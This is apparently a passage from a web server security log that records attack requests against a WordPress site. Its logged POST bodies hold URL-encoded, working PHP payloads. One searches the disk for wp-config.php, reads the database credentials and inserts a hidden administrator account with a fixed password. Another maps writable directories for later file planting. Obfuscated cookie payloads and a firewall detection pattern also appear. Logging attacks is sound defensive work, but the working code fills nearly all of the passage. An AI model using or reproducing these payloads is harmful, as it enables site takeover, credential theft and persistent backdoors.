20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/feed.php HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=ea1451643f613b39572752b883798a94; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMTpvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaA5plV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12640\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept:*\/*\naccept-encoding:gzip,deflate\n\ndg=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 13:19:21","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> UL:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\ncontent-length:3339\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvIHjvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz9vK2ywo252K2uuozEfMFV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\ncontent-type:application\/x-www-form-urlencoded\nhost:dewenlabels.com\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\naccept:*\/*\nupgrade-insecure-requests:1\n\nUL=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 13:19:58","213.209.159.254","POST","\/","Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> cO:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=1af844051764377410b827578daae50e; 